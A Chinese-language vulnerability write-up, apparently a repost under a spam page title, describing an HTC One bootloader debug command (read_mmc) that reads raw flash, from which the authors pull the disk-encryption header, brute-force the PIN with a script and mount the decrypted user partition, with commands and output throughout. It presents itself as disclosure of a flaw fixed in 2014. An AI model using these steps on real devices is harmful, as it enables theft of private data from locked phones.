压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

　　HTC One手機運行的是Android 4.2.2、HBOOT 1.54.0000，它存在一個名為Bootloader的漏洞。這個漏洞早在2014年2月份就報告給了HTC官方，并在次月就修復(fù)了該漏洞。在得到HTC官方同意后，我們現(xiàn)在就將整個漏洞利用測試過程發(fā)布出來。

　　read_emmc命令在2011發(fā)布的HTC DesireZ手機中也曾出現(xiàn)過。這個命令允許攻擊者訪問手機內(nèi)存，并可能獲取短信、聯(lián)系人等敏感信息。

　　此外，這條命令允許攻擊者通過bruteforce自動獲取手機PIN/passcode。他會打開一個額外的缺口防止用戶定義易猜解的PIN/passcode(比如說就4個數(shù)字的PIN)。這是常有的事情，因為日常解鎖手機也是可以使用PIN/passcode的。

　　這個攻擊僅限于HTC One手機且還得開啟全盤加密，也就是說手機由安卓加密保護。

　　read_emmc命令在部分HTC手機中似乎是一個用來調(diào)試的命令。在我們看來，這條命令不應(yīng)該出現(xiàn)在用戶手機上。

　　這篇文章描述了HTC One在安卓全盤加密上的強悍安全機制(AES加密， 合理的密鑰長度， salt) 。

　　訪問閃存

　　將HTC One關(guān)機然后插入電腦，然后進入fastboot模式（關(guān)機狀態(tài)按住音量+鍵以及開機鍵，然后放開開機鍵），這樣我們可以從HBOOT進入fastboot模式。

　　到了這里，我們就可以利用fastboot進行讀取內(nèi)存操作了，命令如下：

　　commandformat：

　　read_mmc [emmc/sd] [start] [#blocks] [#blocks/read] [show]

　　我們來看看參數(shù)的定義：

　　第一個參數(shù)，告訴機器從哪里讀取。“emmc”是讀取閃存，“sd”是讀取內(nèi)存卡

　　#blocks： 讀取塊的數(shù)量

　　#blocks/read：一次讀取塊的數(shù)量

　　show：設(shè)置成1來顯示結(jié)果

　　讀取第一個扇區(qū)，可以使用如下命令

　　$fastboot oem read_mmc emmc 0 1 1 1

　　…

　　(bootloader) reading sector 0 ~ 0

　　(bootloader) 0

　　…

　　(bootloader) 0

　　(bootloader) DF

　　(bootloader) FF

　　(bootloader) 3

　　(bootloader) 0

　　(bootloader) 20

　　(bootloader) E0

　　(bootloader) 9F

　　(bootloader) 3

　　(bootloader) 55

　　(bootloader) AA

　　(bootloader) read sector done average = 172

　　OKAY [  0.310s]

　　finished. total time： 0.311s

　　從頭開始看，我們可以看到許多的0（超過400字節(jié)），其結(jié)尾是“55 AA” 。

　　在手機上使用ADB Shell，我們可以看到用戶的數(shù)據(jù)分區(qū)塊“mmcblk0p37”是從6422528開始的。在安卓下它與掛載的ext4分區(qū)對應(yīng)

　　shell@android#cat /proc/emmc

　　dev：        size     erasesize name

　　…

　　mmcblk0p37： 680000000 00000200 "userdata"

　　shell@android：# cat /sys/block/mmcblk0/mmcblk0p37/start

　　6422528

　　shell@android：# mount

　　…

　　/dev/block/mmcblk0p37 /data ext4 rw，nosuid，nodev，noatime，discard，noauto_da_alloc，data=ordered 0 0

　　因此，攻擊者可以使用“read_mmc” 命令，在閃存中瀏覽用戶數(shù)據(jù)分區(qū)中的內(nèi)容，即使用戶設(shè)定了PIN/密碼都無法阻止。

　　$fastboot oem read_mmc emmc 6422530 1 1 1

　　…

　　(bootloader) reading sector 6422530 ~ 6422530

　　(bootloader) 0

　　…

　　(bootloader) 2F

　　(bootloader) 64

　　(bootloader) 61

　　(bootloader) 74

　　(bootloader) 61

　　…

　　(bootloader) read sector done average = 146

　　OKAY [  0.359s]

　　finished. total time： 0.359s

　　“2F 64 61 74 61”字節(jié)序列是位于用戶數(shù)據(jù)分區(qū)開始的“/data” ASCII字符串。

　　我們的第一個想法就是實現(xiàn)從閃存將用戶數(shù)據(jù)進行轉(zhuǎn)儲，然而這個過程需要幾天甚至是幾個月時間。

　　另一個想法是利用FUSE(用戶空間的文件系統(tǒng))通過USB連接電腦轉(zhuǎn)儲用戶數(shù)據(jù)。

　　繞過安卓全盤加密（PDE）

　　在HTC Desire Z（ Android 2.x）時代還沒有出現(xiàn)全盤加密，我們現(xiàn)在考慮是否有辦法繞過PDE，使用“read_mmc”漏洞。

　　ThomasCannon在2012年Defcon大會上向我們演示了PDE工作過程，使用 bruteforce破解PIN/passcode以及解密用戶扇區(qū)數(shù)據(jù)的腳本。在那個時候，他使用的是Google Nexus S純原生，與這里這個例子稍有不同。

　　我們決定對設(shè)備進行加密，“存儲>手機存儲加密”。通過其方法，我們注意到出現(xiàn)了一個額外的分區(qū)，這個分區(qū)就是用來存儲密鑰的。

　　$hexdump -C extra

　　00000000  c4 b1 b5 d0 01 00 00 00  68 00 00 00 00 00 00 00 |……..h…….|

　　00000010  20 00 00 00 00 00 00 00  00 00 40 03 00 00 00 00  |………@…..|

　　00000020  00 00 00 00 61 65 73 2d  63 62 63 2d 65 73 73 69 |….aes-cbc-essi|

　　00000030  76 3a 73 68 61 32 35 36  00 00 00 00 00 00 00 00 |v：sha256……..|

　　00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 |…………….|

　　*

　　00000060  00 00 00 00 00 00 00 00 {15 d2 9c 16 1c 54 40 1c |………….T@.|

　　00000070  b4 c1 e4 91 69 10 4b 55  2e 47 64 31 13 52 ad 2d |….i.KU.Gd1.R.-|

　　00000080  bd 8c 42 8e d6 c4 84 00} 00 00 00 00 00 00 00 00 |..B………….|

　　00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 |…………….|

　　000000a0  00 00 00 00 00 00 00 00 [c7 1f 34 80 97 09 fd 39 |……….4….9|

　　000000b0  0b 4a 91 d9 d9 d8 00 cd] 00 00 00 00 00 00 00 00 |.J…………..|

　　000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 |…………….|

　　*

　　00000200

　　Note： 對主密鑰及內(nèi)部數(shù)據(jù)解密，推薦大家看看Thomas的幻燈片。

　　我們正好處于加密頭的位置，于是我可以很快得到

　　shell@android#cat /proc/emmc

　　dev：        size     erasesize name

　　…

　　mmcblk0p27： 00010000 00000200 "extra"

　　shell@android：# cat /sys/block/mmcblk0/mmcblk0p27/start

　　586799

　　然后，我們可以再次確認用戶數(shù)據(jù)分區(qū)被加密。第一個字節(jié)告訴我們，“This is an encrypted device：)”，這僅僅是在HTC One中才有的。他之所以能這么寫，是因為在默認的ext4分區(qū)中第一個字節(jié)并沒有使用，其他字節(jié)都是隨機字節(jié)。

　　shell@android：#./busybox hexdump -C /dev/block/mmcblk0p37 -n 64

　　00000000  54 68 69 73 20 69 73 20  61 6e 20 65 6e 63 72 79 |This is an encry|

　　00000010  70 74 65 64 20 64 65 76  69 63 65 3a 29 6f c3 a0 |pted device：)o..|

　　00000020  26 bc 76 ed a8 77 ef 6a  95 28 32 ab 24 ce 8d 58 |&.v..w.j.(2.$..X|

　　00000030  91 fe 8e 14 9e 81 05 a4  28 65 64 3c 1b e2 11 56 |……..(ed<…V|

　　00000040

　　接著，我們可以確定能夠訪問這個頭，使用fastboot 中“read_mmc” 命令對用戶數(shù)據(jù)分區(qū)進行加密

　　$fastboot oem read_mmc emmc 586799 1 1 1

　　由此，我們可以編寫一個小腳本來讀取PDE頭，用戶數(shù)據(jù)分區(qū)的第一個扇區(qū)然后通過電腦進行破解。

　　#python bruteforce_htcone_over_reademmc.py

　　oem read_mmc emmc 6422528 1 1 1

　　oem read_mmc emmc 586799 1 1 1

　　Footer File    ： extra

　　Magic          ： 0xD0B5B1C4

　　Major Version  ： 1

　　Minor Version  ： 0

　　Footer Size    ： 104 bytes

　　Flags          ： 0x00000000

　　Key Size       ： 256 bits

　　Failed Decrypts： 0

　　Crypto Type    ： aes-cbc-essiv：sha256

　　Encrypted Key  ：0x15D29C161C54401CB4C1E49169104B552E4764311352AD2DBD8C428ED6C48400

　　Salt           ： 0xC71F34809709FD390B4A91D9D9D800CD

　　—————-

　　Trying to Bruteforce Password… please wait

　　Found PIN?。?0000

　　Saving decrypted master key to &#039；keyfile&#039；

　　掛載用戶數(shù)據(jù)加密分區(qū)

　　攻擊者可以通過上文輕松獲取PIN/passcode，他能正常接通電話，重寫或者創(chuàng)建PIN/passcode，然后開啟ADB，做他想做的任何事。

　　#mkdir mnt

　　# losetup /dev/loop0 userdata.img

　　# cryptsetup –type plain open –c aes-cbc-essiv：sha256 –d keyfile /dev/loop0userdata

　　# mount /dev/mapper/userdata mnt

　　在這個例子上，我們甚至可以通過USB在電腦上執(zhí)行“read_mmc” 命令。